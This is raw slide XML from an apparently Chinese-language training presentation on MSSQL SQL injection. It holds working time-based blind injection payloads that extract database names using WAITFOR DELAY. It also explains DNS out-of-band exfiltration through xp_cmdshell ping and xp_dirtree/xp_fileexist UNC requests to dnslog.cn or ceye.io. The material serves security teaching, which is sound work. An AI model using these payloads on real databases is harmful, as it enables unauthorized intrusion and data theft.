              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>使用 </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WAITFOR DELAY '0:0:5'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>。</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150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>获取数据：  </a:t>
            </a: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id=1' if(ascii(substring((select top 1 name from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>sys.sysdatabases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>),1,1))=109) </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rPr>
              <a:t>waitfor</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 delay '0:0:5'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="479988" indent="-307192">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id=1' if(ascii(substring((select top 1 name from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>sys.sysdatabases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>),2,1))=97) </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rPr>
              <a:t>waitfor</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 delay '0:0:5'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>—</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="479988" indent="-307192">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>查库名、表名、字段名、字段内容使用此法类推即可。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2415657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DD2E6D-2A2A-4437-AD96-86366062AD89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="921572" y="2382235"/>
            <a:ext cx="10577028" cy="4305531"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91419" tIns="45710" rIns="91419" bIns="45710"/>
          <a:lstStyle>
            <a:lvl1pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="25146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6pPr>
            <a:lvl7pPr marL="29718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7pPr>
            <a:lvl8pPr marL="34290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8pPr>
            <a:lvl9pPr marL="38862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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>MSSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>数据库</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>        Microsoft SQL Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>是微软开发的关系型数据库管理系统。作为数据库服务器，它是一种软件产品，主要功能是根据其他软件应用程序的请求存储和检索数据，这些应用程序可以在同一台计算机上运行，也可以在网络（包括 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Internet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）上的另一台计算机上运行。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>默认开放的端口是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1433</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{794BCE03-8D9E-4CE6-95DA-F6001CBAC070}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="906719" y="1499986"/>
            <a:ext cx="3655121" cy="698268"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8C033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>利用总结</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F8C033"/>
              </a:solidFill>
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C4FFFE6-75ED-4B09-BE2A-F6514086A878}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503038" y="468853"/>
            <a:ext cx="2553904" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:ln w="0"/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MSSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:ln w="0"/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:ln w="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4102637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a:t>注入数据外带</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323427" y="1185334"/>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注入数据外带</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709775" y="1885315"/>
            <a:ext cx="12055731" cy="435766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a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>当注入点仅存在盲注时，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>出数据太慢，使用数据外带加速出数据。</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1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>数据外带</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1"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常用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>平台</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594">
              <a:lnSpc>
                <a:spcPct val="20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rPr>
              <a:t>dnslog.cn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594">
              <a:lnSpc>
                <a:spcPct val="20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微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>ceye.io</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>collobrator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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MSSQL DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>数据外带原理：</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利用</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rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>扩展存储过程 指定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>ping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>dnslog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>平台命令带出数据。</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利用</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rPr>
              <a:t>xp_subdirs,xp_dirtree,xp_fileexist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>unc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>路径判断文件发起请求带出数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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40672114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a:t>注入数据外带</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323427" y="1185334"/>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注入数据外带</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709775" y="1885315"/>
            <a:ext cx="12055731" cy="386521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a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>当注入点仅存在盲注时，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>出数据太慢，使用数据外带加速出数据。</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1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>数据外带</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1"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构造原理：</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declare @a varchar(8000);    	#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>声明一个变量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>，字符类型为</a:t>
            </a:r>
            <a:r>
